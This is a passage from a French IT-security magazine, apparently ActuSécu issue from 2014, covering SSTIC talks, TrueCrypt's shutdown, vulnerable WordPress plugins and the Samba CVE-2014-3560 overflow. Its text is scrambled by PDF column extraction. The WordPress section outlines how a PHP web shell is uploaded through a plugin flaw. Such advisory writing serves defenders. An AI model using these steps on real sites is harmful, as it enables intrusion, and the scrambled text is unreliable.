dun terminal. En outre, cest un standard, on ne peut pas Dailleurs, lattaquant il est humain et ils sont plusieurs.
sen passer car il est massivement utilis. Martine le voit bien, des fois ils tapent des commandes b-
tement et font des fautes de frappes rptitions, et des
Cest dans loptique de palier ce type dattaques que fois, ils sont rapides, efficaces et comptents. En tous cas,
Ryad, Thomas et Marion prsentent Caml Crush, un proxy ils aiment bien les administrateurs, surtout ceux qui laissent
PKCS#11 filtrant crit en OCaml. Ce dernier vient se placer des fichiers Excel pleins de mots de passe.
entre lapplication et la bibliothque partage fournies par
le vendeur afin dintercepter les appels lAPI et rejeter Finalement, lincident est caractris, maintenant il faut
ceux qui sont malveillants. Ce proxy est dcoup en deux rpondre, et il faut que a aille vite. L, Martine met lem-
composants : un client, plac au ct de lapplication, et phase sur limportance de la communication : la rponse
un serveur, plac du ct du terminal afin de ne pas tre incident cest un travail dquipe sur lensemble du SI,
contournable. Finalement, les rgles de filtrage des appels mais pas seulement ; les responsables des diffrents ples
lAPI sont dfinies dynamiquement au sein de la configu- de lentreprise, les filiales et voire mme les sous-traitants
ration du proxy. doivent tre sensibiliss. Et dans ces cas l, le mot dordre,
cest diplomatie.
46
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
SSTIC 2014
+ Lets rump!
+ Tuto Miasm - Fabrice Desclaux
+ Cloud ISO 14001 - Take 2 - Arnaud Ebalard
+ Lets talk about SELKS - ric Leblond
+ Kerby@Parsifal - Thomas Calderon & Olivier Levillain
+ SSTICY - Pierre Bienaim
+ Jai cru voir un grosminet - P.-M. Ricordel & P. Capillon
+ Lobfuscation dont vous tes le hros - Serge Guelton
+ Mind your languages - Pierre Chifflier
+Scurit des ADSL... ailleurs - Nicolas Ruff
+
+
Private
From
meeting
NAND till
Aurlien ?
dump - Jean-Yves Burlett
+ x86 anti-decoders (PoC) - Axel Tillequin
+ Stopper lattaque DDos de Bryan... - Gatan Duchaussois
+ jpg or mov, pourquoi choisir? - Christophe Grenier
+ TCP Fast Open - Renaud Dubouguais
+ Rebus - Philippe Biondi Prsentation courte : RpcView : un outil dexploration et
+ BNew - Outil de classification de malwares - ? de dcompilation des MS RPC
+ La rsolution du fameux challenge web100 - said & flux Jean-Marie Borello & Jrmy Boutard & Julien Boutet &
+ IRMA - Alexandre Quint Yoanne Girardin
+ Android 0dayz hunting, again - Fabien Perigaud
+ Les actes SSTIC en ebook - Yves-Alexis Perez http://www.rpcview.org/
+ Raadio sur canap - Jean-Philippe Gaulier
+ Nodescan - Adrien Guinet Prsentation de loutil RPCView, permettant danalyser et
+ Promo : No Such Con - ? de rejouer les MS-RPC, prsent un peu partout, mais non
+ Do not make your own crypto - Guillaume Delugr document par Microsoft. La prsentation a t suivie par
+ A Large Scale Analysis of the Security of Embedded Fir-
mwares - Aurlien Francillon
une dmo montrant lanalyse dun serveur Stuxnet afin de
forcer les clients se dsinstaller.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
dans lanalyse de DRM.
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/ob-
fuscation_de_code_python__amlioration_des_techni/
SSTIC2014-Slides-obfuscation_de_code_python__amliora-
tion_des_techniques_existantes-eyrolles_guelton.pdf
Rfrences
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/ob-
fuscation_de_code_python__amlioration_des_techni/ +[1] https://www.sstic.org/2014/news/
SSTIC2014-Article-obfuscation_de_code_python__amliora-
tion_des_techniques_existantes-eyrolles_guelton.pdf
+ Slides
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/secu-
rite_des_ordivisions/SSTIC2014-Slides-securite_des_ordivi-
sions-basse.pdf
+ Article
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/scu-
rit_de_la_gestion_dynamiqu_cloud/SSTIC2014-Article-scu-
rit_de_la_gestion_dynamiqu_cloud-zheng_ben-othman_
lazri_laniepce.pdf
48
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
LActualit du moment
Tendance
LIT Attaques
DU
Les plugins WordPress vulnrables
Par Arnaud REYGNAUD
MOMENT Vulnrabilits
Samba CVE-2014-3560
Par Etienne BAUDIN
49
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
TrueCrypt : Retour sur une
mort prmature
par Rgis SENET
Joe Pemberton
TrueCrypt ne crypt plus depuis la fin du mois de Mai Paralllement, ou conjointement, lutilisation dun mot
2014. Nous vous proposons une rapide analyse post-mor- de passe, il est possible dutiliser un fichier jouant le rle de
tem dun des plus clbres logiciels grand public de chif- clef secrte pour le chiffrement des donnes. Ces fichiers
frement des donnes. ne subiront aucune modification par TrueCrypt. Bien sr,
ces fichiers sont sensibles aux changements : si les 1024
premiers kilos bytes sont modifis, il ne sera alors plus pos-
sible de dchiffrer vos donnes. Il est donc impratif duti-
> Quest ce que TrueCrypt ? liser des fichiers nayant pas pour vocation tre modifis
(Images, PDF, etc.).
Avant de nous lancer dans de vastes explications, voici un
bref rappel sur ce quest (qutait?) TrueCrypt. Il sagit dun
logiciel gratuit, multi plateforme (Windows, Mac et Linux)
permettant de faire du chiffrement de donnes la vole. Avant sa rapide et brutale disparition,
TrueCrypt tait considr comme robuste. De
Il permet de crer un disque virtuel chiffr contenu lin- nombreux audits furent effectus ...
trieur dun fichier et de le monter comme un disque phy- aucun rel problme de scurit na pu tre
sique. Il est galement possible de chiffrer entirement
identifi
une partition ou un priphrique externe. Le chiffrement
est automatique, en temps rel et transparent pour luti-
TrueCrypt est galement connu pour ses possibilits de dni
lisateur. Toute donne stocke dans un volume TrueCrypt
plausible. Le dni plausible consiste en lincapacit de prou-
sera entirement chiffre, incluant les noms des fichiers et
ver quun conteneur cach et chiffr existe au sein dun
les rpertoires.
conteneur chiffr. Ce second volume chiffr est accessible
laide de son propre mot de passe (et non accessible
Trois algorithmes de chiffrement sont disponibles afin
laide du mot de passe du volume principal). Son existence
dassurer la scurit des donnes : AES, Serpent et Two-
ne peut alors tre prouve, ou plutt, ne peut tre nie.
fish. De nombreuses combinaisons sont galement dis-
ponibles (AES-Twofish, AES-Twofish-Serpent, Serpent-AES,
Avant sa rapide et brutale disparition, TrueCrypt tait consi-
Serpent-Twofish_AES et Twofish-Serpent). Celles-ci per-
dr comme robuste. De nombreux audits furent effectus
mettent de prvenir une potentielle faiblesse dans lun des
afin dprouver sa scurit et ils furent tous unanimes : au-
algorithmes, aux dpens de la vitesse de lecture et dcri-
cun rel problme de scurit na pu tre identifi (Voir 1,
ture. En effet, chaque bloc de donnes est chiffr indivi-
2 et 3).
50 duellement.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> 28 mai 2014, nous avons perdu
TrueCrypt + Sourceforge dclare quaucun de leur voyant permettant
de dtecter une intrusion ne sest affol. (6)
Oui mais
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
La mort de TrueCrypt
sabord dune manire similaire. voque clairement la possibilit dun fork, qui reprendrait
le code source de TrueCrypt toujours disponible sur Github.
Rajoutons cela certains faits marquants :
Le dveloppement de ce fork, bas en Suisse pour viter
+ Demande aux utilisateurs de migrer vers une technolo-
gie NSA compliant
toute influence amricaine, serait moins opaque que celui
de lquipe originale.
+[2] http://news.techworld.com/security/3228701/fbi-
un peu partout dans le monde :
+[5] http://beta.slashdot.org/story/203553
Le site Truecrypt.ch se prsente ainsi comme une plate-
forme ayant pour ambition de rcolter le maximum din-
+[6] https://news.ycombinator.com/item?id=7813121
formations sur larrt de TrueCrypt. Le site met disposition
52 les dernires versions valables de TrueCrypt. De plus, le site
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
WordPress et les plugins
vulnrables
par Arnaud REYGNAUD
Stefanos Kofopoulos
> Introduction
+ Custom Contact Forms 5.1.0.2 ;
+ MailPoet Newsletters 2.6.6 ;
WordPress est un systme de gestion de contenu (CMS
/ Content Management System) gratuit et libre, qui per-
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
WordPress et ses plugins
+
all-in-one-seo-pack-wordpress-plugin.html
La seconde fonction downloadCSVExportFile() reprend
les mmes actions que prcdemment dans un fichier CSV
(Comma-separated values) ;
54 + Enfin, la dernire runImport() sert importer des com-
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> MailPoet Newsletters / Wysija Sans omettre le zip !
Dtails techniques
+Etape 1
Lattaquant va crer une archive reprenant la structure dun
thme accept par le plugin (il faut obligatoirement un
style.css) et y ajouter son shell .PHP (exemple ThemeShell.
php).
+Etape 2
Lastuce se situe dans labus de /wp-admin/admin-post.
php, plus prcisment du hook admin_init().
55
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
WordPress et ses plugins
+Etape 1 :
- Sidentifier sur le site cibl avec des droits non administra-
teur (auteur par exemple)
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Conclusion
> INFO
Bien videmment, cette liste nest pas exhaustive et les
entits cites ne doivent pas tre tenues pour responsables XMCO partenaire mdia de NoSuchCon #2
de toutes les attaques lies WordPress. Dautres plugins
La confrence internationale NoSuchCon aura lieu les 19, 20 et
sont rgulirement touchs linstar de TimThumb, vBul-
21 novembre lespace Niemeyer.
letin, etc., sans omettre les nombreux thmes compromis
ou encore les composants maison dvelopps par les Les membres reconnus de la communaut internationale qui
utilisateurs du CMS. constituent le comit nous ont encore une fois concoct un pro-
gramme des plus allchant avec la prsence dexperts interna-
A lheure actuelle, toutes les vulnrabilits cites ont t tionaux, venus exposer leurs travaux de recherches au travers de
corriges par les diteurs. prsentations souvent techniques.
Quoi quil en soit, quelques conseils simples permettent de Parmis les talks dores et dj annoncs, on peut dj relever :
- Rolf Rolles nous gratifiera dune Keynote intitule Program
rduire les risques encourus :
Synthesis in Reverse Engineering ;
+
- Alex Ionescu, qui fait durer le suspens avec son talk surprise
Nutiliser que les plugins ncessaires , inutile de ra- dont il na pas encore rvl le contenu ;
jouter des vulnrabilits supplmentaires en largissant la - Andrea Barisani prsentera quant lui les avances de son pro-
surface dattaque ; jet USB Armory, et qui devrait mme apporter avec lui quelques
prototypes ;
+ Apporter la plus grande vigilance quant aux plugins et
thmes gratuits. ;
- Nicolas Collignon gratignera les mcanismes de scurit de
la Google App Engine, garanti sans troll et avec des exemples
dattaque concrets ;
+
posera un rsum des confrences au sein du numro #39 de
https://wordpress.org/plugins/ notamment les pages lActuScu.
lies aux /developers/ ainsi que les /changelog/
+https://wordpress.org/plugins/all-in-one-seo-pack/
+http://blog.sucuri.net
+http://cve.mitre.org/cgi-bin/cvename.cgi?-
name=CVE-2014-4725
+http://codex.wordpress.org/Plugin_API/Action_Refe-
rence/admin_init
+http://codex.wordpress.org/Function_Reference/is_ad-
min
+https://dev.metasploit.com/api/Msf/HTTP/Wordpress/
URIs.html
+http://packetstormsecurity.com/files/127475/
Wordpress-WPTouch-Authenticated-File-Upload.html
57
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Samba 4 : faille CVE-2014-3560
Lorigine de la faille Cette fonction permet de faire une copie dun lment de
type unstring dune source s vers une destination d. Pour
Au dbut de lt, une vulnrabilit critique a t dcou- cela, la fonction strlcpy, qui permet de raliser une copie de
verte au sein de la version 4 du clbre serveur CIFS : Sam- chaine de manire scurise est utilise. Le prototype
ba. Cette faille permet de prendre le contrle dun systme de cette fonction est le suivant :
vulnrable distance.
size_t strlcpy(char * restrict dst, const char * restrict
La vulnrabilit provient de la dfinition de la fonction src, size_t size);
unstrcpy utilise au sein du composant nmbd pour
rsoudre les noms NetBIOS. La vulnrabilit provient du fait quaucune vrification nest
effectue sur la taille des donnes copier depuis la source
Avant toute chose, il est ncessaire dobserver la dclara- vers le tampon de destination. Il est donc possible de pro-
tion des types fstring et unstring. voquer un dbordement de tampon.
Comme on peut ainsi le voir dans cet exemple, la va- Celle-ci permet donc la copie dlment de type nstring. Or,
riable unname est au format unstring. Il est donc possible le type nstring est dfini comme ci-dessous:
de mettre 256 octets dans un tampon de seulement 64
octects. Le dbordement, et donc la corruption de la m- #define MAX_NETBIOSNAME_LEN 16
moire, sont invitables. typedef char nstring[MAX_NETBIOSNAME_LEN];
Rfrences
> INFO
Des chercheurs publient le code de lattaque BadUSB + Code vulnrable
https://git .samba.org/?p=samba.git;a=blob;f=lib/
Deux mois aprs la dmonstration de lattaque connue sous le util/string_wrappers.h;h=5f9d5684e62e-
nom BadUSB par SR Labs dans le cadre de la BlackHat (voir 54b526922e83299a8c41c3bfa692
+
CXA-2014-2553), deux chercheurs amricains, Adam Caudill et
Brandon Wilson ont russi reproduire lattaque dans le cadre Vulnrabilit dcouverte par analyse de code
dune autre confrence ddie la scurit : la Derbycon. https://bugzilla.samba.org/show_bug.cgi?id=10758
59
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le whitepaper du mois
par Charles DAGOUAT
errol_51
Testing Guide 4.0 de lOWASP La prochaine tape va sorienter vers la traduction du guide
dans dautres langues afin de renforcer son accessibilit au
Aprs 18 mois de travail, lorganisation Open Web Applica- grand public.
tion Security Project (OWASP) vient de publier son guide de
tests Web dans sa version 4.0. Le document au format PDF est disponible cette adresse :
https://www.owasp.org/images/1/19/OTGv4.pdf
Lobjectif est de renforcer les bonnes pratiques en matire
de scurisation des applications Web travers :
> Twitter
Stphane AVI
61 61
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le meilleur du web
http://www.forensickb.com/2014/02/understan-
Comment fonctionne hyper V
ding-hyper-v-server-when-doing.html
h t t p : // w w w. p o w e r s h e l l m a g a z i n e . co m / s t a -
Une faille lie au CredSSP via PowerShell
ging/?p=8794
62 62
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le meilleur du web
http://articles.forensicfocus.com/2014/04/28/win-
Comment extraire les mots de passe en m- dows-logon-password-get-windows-logon-password-
moire via un plug-in Volatility using-wdigest-in-memory-dump/
http://ecstaticsec.tumblr.com/post/87205770569/su-
Exploitation des failles Sudo do-tricks
63 63
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Will https://twitter.com/harmj0y
64
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Romain MAHIEU
> Remerciements
Photographie
Photo HITB
http://photos.hitb.org/
Alan Bates
https://www.flickr.com/photos/sp3ccylad/495871118/
Tomaz Stolfa
https://www.flickr.com/photos/tomazstolfa/4969030884/
Urban Bamboo
https://www.flickr.com/photos/urbanbamboo/9502886057/
Andrea
https://www.flickr.com/photos/spettacolopuro/3891599149/
Dimitar Krstevski
https://www.flickr.com/photos/alifaan/2608045107/
Joe Pemberton
https://www.flickr.com/photos/joepemberton/8986322869/
Stefanos Kofopoulos
https://www.flickr.com/photos/titanas/3199323703/
Kevin Baird
https://www.flickr.com/photos/kevlar/4640627653/
Nikolay Bachiyski
https://www.flickr.com/photos/nbachiyski/2536017020/
LActuScu est un magazine numrique rdig et dit par les consultants du cabinet
de conseil XMCO. Sa vocation est de fournir des prsentations claires et dtailles sur le
thme de la scurit informatique, et ce, en toute indpendance. Tous les numros de
lActuScu sont tlchargeables ladresse suivante :
http://www.xmco.fr/actusecu.html 65
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
www.xmco.fr
69 rue de Richelieu
75002 Paris - France
SAS (Socits par Actions Simplifies) au capital de 38 120 - Enregistre au Registre du Commerce de Paris RCS 430 137 711
Code NAF 6202A - NSIRET : 430 137 711 00056 - N TVA intracommunautaire : FR 29 430 137 711
66
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.